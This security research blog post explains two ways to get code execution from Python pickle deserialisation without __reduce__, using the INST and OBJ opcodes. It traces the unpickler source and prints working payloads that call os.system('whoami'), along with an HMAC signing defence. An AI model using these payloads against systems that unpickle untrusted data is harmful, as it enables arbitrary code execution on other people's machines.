
Python Pickle RCE without __reduce__

I asked DALL-E for 'Pickle looking pythons' but the results were way too phallic

“Every single pickle deserialisation payload uses __reduce__ … I wonder if it’s possible to get RCE without it”

And that’s how I nerdsniped myself and lost 5h of my life.


Yes, it’s possible. Here are two functional payloads:

>>> inst_bomb
b'(S"whoami"\nios\nsystem\n.'
>>> pickletools.dis(inst_bomb)
    0: (    MARK
    1: S        STRING     'whoami'
   11: i        INST       'os system' (MARK at 0)
   22: .    STOP
highest protocol among opcodes = 0
>>> pickle.loads(inst_bomb)
>>> obj_bomb
b'(cos\nsystem\nS"whoami"\no.'
>>> pickletools.dis(obj_bomb)
    0: (    MARK
    1: c        GLOBAL     'os system'
   12: S        STRING     'whoami'
   22: o        OBJ        (MARK at 0)
   23: .    STOP
highest protocol among opcodes = 1
>>> pickle.loads(obj_bomb)

Foreword #

This blog post won’t explain:

However, what it will detail is how the REDUCE primitive could have been found and how to find novel (to my knowledge) exploit primitives.

For some additional reading, here are links to the best research done on pickle deserialization.

  • Dangerous pickles — malicious python serialization [blog]: Already linked above, the best article to date on pickle deserialization, very well explained.
  • Never a dill moment: Exploiting machine learning pickle files [blog] [conf]: On the resurgence in the use of pickle for Machine Learning and its security implications.
  • Pain Pickle: Systemically bypassing restricted unpickle [conf] [slides]: Great research (in Cantonese) on how to systematically bypass RestrictedUnpicklers to achieve RCE.

The REDUCE primitive #

Before looking for new exploit paths it’s a good idea to first understand how the existing one works by diving into the source code.

NB: Pre-existing comments in the source code have been removed for the sake of clarity.

When a REDUCE opcode is read, the main fetch-decode-execute loop calls the corresponding function (load_reduce).

def load_reduce(self):
    stack = self.stack
    args = stack.pop()      # pop args (tuple) top of the stack
    func = stack[-1]        # get value from top of the stack (function)
    stack[-1] = func(*args) # call func with args -> RCE
                            # arg1(*arg2) is a pattern that will come back later.

The load_reduce function requires a callable to have already been pushed onto the stack. There are a few ways of doing this, the easiest being the GLOBAL or STACK_GLOBAL instructions. The two corresponding functions work in a very similar way: load_global reads the module and name as newline-terminated strings from the pickle stream, whilst load_stack_global pops both values off the stack.

def load_global(self):
    module = self.readline()[:-1].decode("utf-8") # read module string
    name = self.readline()[:-1].decode("utf-8")   # read name string
    klass = self.find_class(module, name)         # call find_class
    self.append(klass)                            # append result to stack
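As a minimal sketch of the two ways of getting a callable onto the stack, the hand-assembled pickles below push builtins.len with GLOBAL and with STACK_GLOBAL, then call it through REDUCE. builtins.len is only a harmless stand-in chosen for this illustration (the payloads in this post use os.system), and the variable names are made up.

```python
import pickle

# GLOBAL reads "module\nname\n" straight from the pickle stream.
via_global = (
    b"cbuiltins\nlen\n"   # GLOBAL: push builtins.len
    b'(S"whoami"\n'       # MARK, then STRING: push 'whoami'
    b"t"                  # TUPLE: collapse everything above MARK into ('whoami',)
    b"R"                  # REDUCE: call len(*('whoami',))
    b"."                  # STOP
)

# STACK_GLOBAL (opcode 0x93) pops the name, then the module, off the stack.
via_stack_global = (
    b"Vbuiltins\n"        # UNICODE: push 'builtins'
    b"Vlen\n"             # UNICODE: push 'len'
    b"\x93"               # STACK_GLOBAL: push builtins.len
    b'(S"whoami"\ntR.'    # same call sequence as above
)

result_global = pickle.loads(via_global)
result_stack_global = pickle.loads(via_stack_global)
print(result_global, result_stack_global)
```

Both loads return the length of 'whoami'. Swapping the module/name pair is all it takes to call something less friendly.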

The call to find_class seems to be the important part of load_global, so let’s investigate.

NB: Since the PROTO opcode (protocol version, 0 by default) is optional and has no real influence on the program flow, it has been omitted from the given payloads for the sake of brevity.

def find_class(self, module, name):
    sys.audit('pickle.find_class', module, name)
    if self.proto < 3 and self.fix_imports:
        ...                                       # fix the imports (elided)
    __import__(module, level=0)                   # import the module
    if self.proto >= 4:                           # both branches do the same thing
        return _getattribute(sys.modules[module], name)[0]
    else:
        return getattr(sys.modules[module], name) # return module.function
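Stripped of the audit hook and the import fixing, the core of find_class is small enough to reproduce outside the unpickler. The sketch below is a simplified stand-in, not the library's code, and resolve is a hypothetical name used only here.

```python
import os
import sys

def resolve(module: str, name: str):
    """Hypothetical stand-in for the core of find_class (no audit, no import fixing)."""
    __import__(module, level=0)                # make sure the module is in sys.modules
    return getattr(sys.modules[module], name)  # fetch the attribute by name

resolved = resolve("os", "system")
print(resolved is os.system)
```

Two attacker-controlled strings are enough to obtain a reference to any importable callable. Nothing is executed at this point apart from the import itself.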

Being able to import functions and specific modules is an extremely useful primitive, thus the search for a REDUCE-less payload started by looking for functions calling find_class.
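One way to check which opcodes end up in find_class without reading the whole source is to override it in a subclass and record the calls. The sketch below assumes a hypothetical TracingUnpickler helper and uses builtins.len as a harmless target. The three payloads are hand-assembled for this illustration.

```python
import io
import pickle

class TracingUnpickler(pickle.Unpickler):
    """Hypothetical helper: records every (module, name) passed to find_class."""

    def __init__(self, data: bytes):
        super().__init__(io.BytesIO(data))
        self.lookups = []

    def find_class(self, module, name):
        self.lookups.append((module, name))      # remember what was requested
        return super().find_class(module, name)  # then resolve it as usual

def trace(data: bytes):
    unpickler = TracingUnpickler(data)
    value = unpickler.load()
    return value, unpickler.lookups

payloads = {
    "GLOBAL": b'cbuiltins\nlen\n(S"whoami"\ntR.',
    "STACK_GLOBAL": b'Vbuiltins\nVlen\n\x93(S"whoami"\ntR.',
    "INST": b'(S"whoami"\nibuiltins\nlen\n.',
}
for opcode, data in payloads.items():
    print(opcode, trace(data))
```

Each payload triggers exactly one lookup of ('builtins', 'len'), including the one that contains no REDUCE opcode at all.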

The INST primitive #

The only other interesting function that calls find_class is the load_inst function.

def load_inst(self):
    module = self.readline()[:-1].decode("ascii") # read module string
    name = self.readline()[:-1].decode("ascii")   # read name string
    klass = self.find_class(module, name)         # call find_class
    self._instantiate(klass, self.pop_mark())     # call _instantiate

The function ends with a call to _instantiate.

def _instantiate(self, klass, args):
    if (args or not isinstance(klass, type) or
        hasattr(klass, "__getinitargs__")):
        try:
            value = klass(*args)   # the arg1(*arg2) pattern reemerges
        except TypeError as err:
            raise TypeError("in constructor for %s: %s" %
                            (klass.__name__, str(err)), sys.exc_info()[2])
    else:
        value = klass.__new__(klass)
    self.append(value)
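The branching in _instantiate is easier to see in isolation. Below is a standalone paraphrase of it, with the error wrapping omitted. The instantiate function and the Probe class are hypothetical names for this sketch only.

```python
def instantiate(klass, args):
    """Standalone paraphrase of _instantiate's branching (error wrapping omitted)."""
    if args or not isinstance(klass, type) or hasattr(klass, "__getinitargs__"):
        return klass(*args)      # ordinary call: works for any callable
    return klass.__new__(klass)  # bare allocation: __init__ is skipped

class Probe:
    def __init__(self):
        self.initialised = True

called = instantiate(len, ["whoami"])  # a function is not a type, so it gets called
bare = instantiate(Probe, [])          # a class with no args only goes through __new__
print(called, hasattr(bare, "initialised"))
```

The first branch is the interesting one: anything that is not a class, or any call that carries arguments, is simply invoked.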

Just like load_reduce, _instantiate takes a callable (klass) and a sequence of arguments (args) and calls the callable with those values as arguments (klass(*args)), allowing for arbitrary code execution. Since os.system is not a class, the not isinstance(klass, type) check alone is enough to take the calling branch. Below is an annotated example payload:

>>> pickletools.dis(b'(S"whoami"\nios\nsystem\n.', annotate=1)
    0: (    MARK Push markobject onto the stack.
    1: S        STRING     'whoami' Push a Python string object.
   11: i        INST       'os system' (MARK at 0) Build a class instance.
   22: .    STOP                                   Stop the unpickling machine.
highest protocol among opcodes = 0
>>> pickle.loads(b'(S"whoami"\nios\nsystem\n.')
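The INST payload has a very regular layout: MARK, one STRING per argument, then INST followed by the module and name lines, then STOP. A small builder makes that explicit. build_inst and _string_op are hypothetical helpers, and the sketch only accepts plain ASCII arguments that need no escaping.

```python
import pickle

def _string_op(arg: str) -> bytes:
    # Keep the sketch simple: refuse characters that would need escaping.
    if not arg.isascii() or any(ch in arg for ch in '"\\\n'):
        raise ValueError("unsupported characters in argument")
    return b'S"' + arg.encode("ascii") + b'"\n'

def build_inst(module: str, name: str, *args: str) -> bytes:
    """Hypothetical helper: MARK, one STRING per argument, INST, STOP."""
    body = b"".join(_string_op(a) for a in args)
    target = module.encode("ascii") + b"\n" + name.encode("ascii") + b"\n"
    return b"(" + body + b"i" + target + b"."

harmless = build_inst("builtins", "len", "whoami")
print(harmless)
print(pickle.loads(harmless))
```

Calling build_inst("os", "system", "whoami") reproduces the payload shown above byte for byte. The harmless variant merely returns the length of its argument.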

The OBJ primitive #

The search for other functions calling _instantiate yielded only a single other function: load_obj.

def load_obj(self):
    args = self.pop_mark()
    cls = args.pop(0)
    self._instantiate(cls, args)

It works in a very similar way to load_reduce: the function pops everything above the MARK, takes the first item as the function and the remaining items as its arguments, and calls the function with those arguments (via _instantiate). Below is an annotated example payload:

>>> pickletools.dis(b'(cos\nsystem\nS"whoami"\no.', annotate=1)
    0: (    MARK Push markobject onto the stack.
    1: c        GLOBAL     'os system' Push a global object (module.attr) on the stack.
   12: S        STRING     'whoami'    Push a Python string object.
   22: o        OBJ        (MARK at 0) Build a class instance.
   23: .    STOP                       Stop the unpickling machine.
highest protocol among opcodes = 1
>>> pickle.loads(b'(cos\nsystem\nS"whoami"\no.')
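With OBJ the callable sits on the stack right after the MARK, so it goes first and the arguments follow. The sketch below builds such a payload with a hypothetical build_obj helper and uses operator.concat as a harmless two-argument target. As before, only plain ASCII arguments are supported.

```python
import pickle

def _string_op(arg: str) -> bytes:
    # Keep the sketch simple: refuse characters that would need escaping.
    if not arg.isascii() or any(ch in arg for ch in '"\\\n'):
        raise ValueError("unsupported characters in argument")
    return b'S"' + arg.encode("ascii") + b'"\n'

def build_obj(module: str, name: str, *args: str) -> bytes:
    """Hypothetical helper: MARK, GLOBAL, one STRING per argument, OBJ, STOP."""
    target = b"c" + module.encode("ascii") + b"\n" + name.encode("ascii") + b"\n"
    body = b"".join(_string_op(a) for a in args)
    return b"(" + target + body + b"o."

harmless = build_obj("operator", "concat", "who", "ami")
print(harmless)
print(pickle.loads(harmless))
```

Everything between the GLOBAL and the OBJ opcode becomes a positional argument, so multi-argument calls need no TUPLE opcode.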

Please stop using pickle. Attempts to make pickle secure are meaningless (except, I guess, for signing the data with an HMAC), as the hacker will forever subvert the developer.
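For completeness, here is a minimal sketch of the HMAC idea, assuming a secret key shared between the writer and the reader. SECRET_KEY, dumps_signed and loads_signed are hypothetical names. This only authenticates where the bytes came from and does nothing to make unpickling itself any safer.

```python
import hashlib
import hmac
import pickle

SECRET_KEY = b"replace-with-a-real-secret"  # placeholder key, an assumption for this sketch

def dumps_signed(obj) -> bytes:
    payload = pickle.dumps(obj)
    tag = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    return tag + payload                    # 32-byte tag followed by the pickle

def loads_signed(blob: bytes):
    tag, payload = blob[:32], blob[32:]
    expected = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):  # constant-time comparison
        raise ValueError("bad signature, refusing to unpickle")
    return pickle.loads(payload)            # only reached for authentic data

blob = dumps_signed({"user": "alice"})
print(loads_signed(blob))
```

A payload that was not produced with the key, such as the INST and OBJ examples in this post, is rejected before pickle.loads ever sees it. Anyone who obtains the key is back to full code execution.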